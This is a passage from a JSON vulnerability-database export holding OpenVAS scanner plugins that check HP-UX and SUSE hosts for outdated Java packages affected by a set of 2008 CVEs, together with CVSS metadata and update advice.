revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_5_0-ibm\n java-1_5_0-ibm-alsa\n java-1_5_0-ibm-devel\n java-1_5_0-ibm-fonts\n java-1_5_0-ibm-jdbc\n java-1_5_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:136141256231065907", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065907", "type": "openvas", "title": "SLES10: Security update for IBM Java 1.5.0", "sourceData": "#\n#VID slesp2-java-1_5_0-ibm-5960\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for IBM Java 1.5.0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_5_0-ibm\n java-1_5_0-ibm-alsa\n java-1_5_0-ibm-devel\n java-1_5_0-ibm-fonts\n java-1_5_0-ibm-jdbc\n java-1_5_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65907\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-5350\", \"CVE-2008-5346\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5359\", \"CVE-2008-5341\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5348\", \"CVE-2008-2086\", \"CVE-2008-5345\", \"CVE-2008-5351\", \"CVE-2008-5360\", \"CVE-2008-5353\", \"CVE-2008-5356\", \"CVE-2008-5354\", \"CVE-2008-5357\", \"CVE-2008-5352\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for IBM Java 1.5.0\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm\", rpm:\"java-1_5_0-ibm~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-alsa\", rpm:\"java-1_5_0-ibm-alsa~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-devel\", rpm:\"java-1_5_0-ibm-devel~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-fonts\", rpm:\"java-1_5_0-ibm-fonts~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-jdbc\", rpm:\"java-1_5_0-ibm-jdbc~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-plugin\", rpm:\"java-1_5_0-ibm-plugin~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n IBMJava5-JRE\n IBMJava5-SDK\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5041763 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65489", "href": "http://plugins.openvas.org/nasl.php?oid=65489", "type": "openvas", "title": "SLES9: Security update for IBM Java5 JRE and SDK", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5041763.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for IBM Java5 JRE and SDK\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n IBMJava5-JRE\n IBMJava5-SDK\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5041763 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65489);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-5350\", \"CVE-2008-5346\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5359\", \"CVE-2008-5341\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5348\", \"CVE-2008-2086\", \"CVE-2008-5345\", \"CVE-2008-5351\", \"CVE-2008-5360\", \"CVE-2008-5353\", \"CVE-2008-5356\", \"CVE-2008-5354\", \"CVE-2008-5357\", \"CVE-2008-5352\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for IBM Java5 JRE and SDK\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"IBMJava5-JRE\", rpm:\"IBMJava5-JRE~1.5.0~0.57\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n IBMJava5-JRE\n IBMJava5-SDK\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5041763 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", 